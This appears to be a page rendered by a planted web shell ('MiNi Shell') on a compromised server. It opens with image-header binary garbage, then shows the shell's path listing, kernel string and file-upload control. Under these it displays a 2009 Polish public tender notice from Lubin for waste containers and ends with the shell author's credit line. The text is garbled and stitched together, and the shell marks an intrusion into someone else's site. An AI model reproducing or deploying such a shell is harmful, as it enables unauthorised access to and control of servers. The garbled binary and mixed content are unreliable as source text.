JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/45230-N-2009.html

<p class="kh_header"><b>Lubin: 1.Dostawa kontenerów hakowych o pojemności 34m3 - 3 szt. wraz                     z  urządzeniem zwijającym i plandeką.
2.Dostawa kontenerów hakowych, o pojemności 10m3 - 3 szt. wraz                    z urządzeniem zwijającym i plandeką. 
3.Dostawa kontenerów odkrytych typu Mulda o pojemności 6m3 - 5 szt.</b><br>
<b>Numer ogłoszenia: 45230 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania sp. z o.o. w Lubinie , ul. Rzeźnicza 1, 59-300 Lubin, woj. dolnośląskie, tel. (076) 7249940, faks (076) 7249950.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpo.lubin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.Dostawa kontenerów hakowych o pojemności 34m3 - 3 szt. wraz                     z  urządzeniem zwijającym i plandeką.
2.Dostawa kontenerów hakowych, o pojemności 10m3 - 3 szt. wraz                    z urządzeniem zwijającym i plandeką. 
3.Dostawa kontenerów odkrytych typu Mulda o pojemności 6m3 - 5 szt..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Części zamówienia:
1.Części pierwsza: Dostawa kontenerów hakowych o pojemności 34m3 - 3 szt. wraz z  urządzeniem zwijającym i plandeką.
2.Część druga: Dostawa kontenerów hakowych o pojemności 10m3 -                   3 szt. wraz z urządzeniem zwijającym i plandeką. 
3.Część trzecia: Dostawa kontenerów odkrytych typu Mulda o pojemności 6m3 -  5 szt.
CPV (Wspólny Słownik Zamówień)
- 44613300 - 3 Standardowe pojemniki do przewozu ładunków
1.Część pierwsza: Dostawa kontenerów hakowych o pojemności 34 m3 - 3 szt. wraz z urządzeniem zwijającym i plandeką.
Muszą być wykonane w/g opisu:
wymiar wewnętrzny 6,5 x 2,3 x 2,25 (m)
blacha stalowa St3SX
dno wykonane z blachy o grubości 4mm
boki wykonane z blachy o grubości 3mm
usztywnienia pionowe na ścianach bocznych  z ceownika zg 80x50x3 (mm) co 750mm, plus wręga pozioma na  środkowej części kontenera
usztywnienia w dnie co 350 mm
ściany gięte po promieniu R-110 mm
wieniec (zakończenie ściany) z rury 88,9 x 6,3(mm)
wymiary uchwytów i zamocowań zgodne z normą DIN 30722
wysokość  ucha na hak 1570 mm od podłoża 
rama nośna i piony wykonane z dwuteownika 180 mm
dwie rolki zewnętrzne
haczyki do plandeki po obwodzie kontenera
podwójne drzwi na trzech potrójnych zawiasach, każde obramowanie: ceownik zimno gięty 100x50x3 (mm), plus wzmocnienia w poprzek drzwi
stopnie na ścianie czołowej z lewej strony w kierunku jazdy
centralne zamknięcie na oboje drzwi
spoiny ciągłe do ramy nośnej
hak wykonany z  pręta fi 50 mm ze stali St 52
całość powierzchni kontenera malowana farbą podkładową i nawierzchniową 
urządzenie zwijające z plandeką
kolor zielony
wyprodukowane w 2009 r.
2.Część druga: Dostawa kontenerów hakowych,  o pojemności 10 m3 - 3 szt. wraz z urządzeniem zwijającym i plandeką.
Muszą być wykonane wg opisu: 
wymiar wewnętrzny 6,5 x 2,3 x 0,7 (m)
blacha stalowa St3SX
dno wykonane z blachy o grubości 4mm
boki wykonane z blachy o grubości 3mm
usztywnienia pionowe na ścianach bocznych  z ceownika zg 80x50x3 co 750mm 
usztywnienia w dnie co 350 mm
ściany gięte po promieniu R-110mm
wieniec (zakończenie ściany) z rury 88,9 x 6,3 (mm)
wymiary uchwytów i zamocowań zgodne z normą DIN 30722
wysokość ucha na hak 1570 mm od podłoża
rama nośna i piony wykonane z dwuteownika 180 mm
dwie rolki zewnętrzne
haczyki do plandeki po obwodzie kontenera
podwójne drzwi na trzech potrójnych zawiasach, każde obramowanie: ceownik zimno gięty 100x50x3 (mm), plus wzmocnienia w poprzek drzwi
stopnie na ścianie czołowej z lewej strony w kierunku jazdy
centralne zamknięcie na oboje drzwi
spoiny ciągłe do ramy nośnej
hak wykonany z  pręta fi 50 mm ze stali St 52
całość powierzchni kontenera malowana farbą podkładową i nawierzchniową.
urządzenie zwijające z plandeką
kolor zielony
wyprodukowane w 2009 r.
3.Część trzecia: Dostawa kontenerów odkrytych typu Mulda o pojemności 6m3 - 5 szt.
Muszą być wykonane wg opisu:
wymiar wewnętrzny 3500x1700x1250 (cm)
rama wykonana z ceownika 80x50x3 (mm) zg
czopy - 4 sztuki wykonane z pręta fi 40 mm
wymiary uchwytów i zamocowań zgodnie z normą DIN 30720
dno wykonane z blachy o grubości 5 mm
ściany wykonane z blachy o grubości 3 mm
potrójny zaczep
załadunek bramowy
kolor zielony
wyprodukowane w 2009 r.
WARUNKI  OGÓLNE, JEDNAKOWE DLA WSZYSTKICH CZĘŚCI ZAMÓWIENIA
1)Miejsce dostawy: miasto 59-300 Lubin, woj. dolnośląskie, Baza Eksploatacyjna Zamawiającego, ul. Rzeźnicza 1.
2)Na przedmiot zamówienia Wykonawca udziela minimum 12 miesięcznego okresu gwarancji.
3)Zamawiający dokona zapłaty po dostawie przedmiotu zamówienia w terminie 30 dni od daty doręczenia Zamawiającemu prawidłowo wystawionej faktury 
VAT.
4)Kontenery muszą posiadać Świadectwa zgodności CE ( należy dołączyć wymienione  dokumenty na każdą część zamówienia osobno).
4. Termin wykonania zamówienia = ( TERMINY DOSTAW ): jednakowy dla  
każdej  części zamówienia: do 24.03.2009 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 44.61.33.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.03.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)Spełniają następujące warunki określone w Art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tekst jednolity Dz. U. z 2007 r. Nr 223, poz. 1655 z pożń. zm. ):
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2)Nie podlegają wykluczeniu z postępowania przetargowego z powodów wymienionych w art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tekst jednolity Dz.U. z 2007 r., nr 223, poz. 1655 z póżn. zm.)
3)Złożoną ofertę z wymogami zawartymi w SIWZ zamieszczonej na stronie internetowej: www.mpo.lubin.pl
4)Zapoznali się z treścią SWIZ, zawartym w niej wzorem umowy i w razie wyboru oferty są gotowi do jej podpisania.
2.W przypadku wykluczenia Wykonawcy z postępowania, Zamawiający niezwłocznie zawiadomi go o tym fakcie, podając uzasadnienie faktyczne 
i prawne.
3.Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą
4.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie załączonych przez Wykonawców oświadczeń i dokumentów, których zestawienie znajduje się w pkt.  10 niniejszej SIWZ oraz na podstawie spełniania innych określonych w niniejszej SIWZ wymagań.
5.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentacji ich   w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się wówczas odpowiednio do tych Wykonawców.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)Na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia wraz z Formularzem ofertowym Załącznik nr 1 następujących wypełnionych i podpisanych dokumentów:
a)Oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych - Załącznik nr 2 formularza ofertowego;
b)Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c)Koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej 
w zakresie objętym zamówieniem publicznym;
d)Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
e)Oświadczenia, że oferowany przedmiot zamówienia spełnia wszystkie warunki wymienione w pkt. 3 SIWZ ( Opis przedmiotu zamówienia) - oświadczenie znajduje się w treści formularza ofertowego;
f)Dokument ustanawiający pełnomocnika i upoważniający go do reprezentowania podmiotów występujących wspólnie albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (dokument wymagany tylko w przypadku złożenia oferty wspólnej).
2)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1) ppkt b, d, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-nie otwarto jego likwidacji ani nie ogłoszono upadłości;
-nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
-nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu.
3)Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w powyższym punkcie, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4)Oferta musi być sporządzona zgodnie z załączonym formularzem ofertowym, którego załącznikami muszą być ww. dokumenty.
5)Kopie dokumentów muszą być potwierdzone (za zgodność z oryginałem)
przez osobę uprawnioną do reprezentowania Wykonawcy bądź przez notariusza.
6)Upoważnienie do podpisania oferty wraz z wszystkimi załącznikami oraz do potwierdzania dokumentów (za zgodność z oryginałem) powinno wynikać 
z odpisu z właściwego rejestru. W przypadku podpisania oferty oraz potwierdzania kopii dokumentów (za zgodność z oryginałem) przez osobę nie wymienioną w odpisie z właściwego rejestru należy dołączyć jej pełnomocnictwo udzielone przez osoby uprawnione do reprezentowania podmiotu. 
7)Zgodnie z Art. 26 ust. 3-4 ustawy Prawo zamówień publicznych Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania    
11.  Oferty składane przez wykonawców występujących wspólnie 
1)Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2)Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców występujących wspólnie.
3)Wykonawcy występujący wspólnie, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenie należytego wykonania umowy.  
4)Jeżeli oferta wykonawców występujących wspólnie została wybrana, zamawiający może żądać przez zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
12.Pozostałe dokumenty bezwzględnie wymagane w ofercie
1)Pełnomocnictwo wystawione dla osoby podpisującej ofertę- tylko w przypadku podpisania przez osobę nie uprawnioną do reprezentacji wprost z postanowień KRS lub ewidencji działalności gospodarczej.
2)Dokument ustanawiający pełnomocnika i upoważniający go do podpisania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu.
3)Wypełniony załącznik Nr 3 - informacja dotycząca tej części zamówienia, którą Wykonawca zamierza powierzyć podwykonawcą ( dołączenie załącznika jest niezbędne jedynie w przypadku zaangażowania podwykonawców ).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Oczyszczania Sp. z o.o. w Lubinie, ul. Rzeźnicza 1,       59-300 Lubin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 09:00, miejsce: Siedziba Zamawiającego tj. Rzeźnicza 1, 59-300 Lubin, w sekretariacie (II piętro, pokój 305 ).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com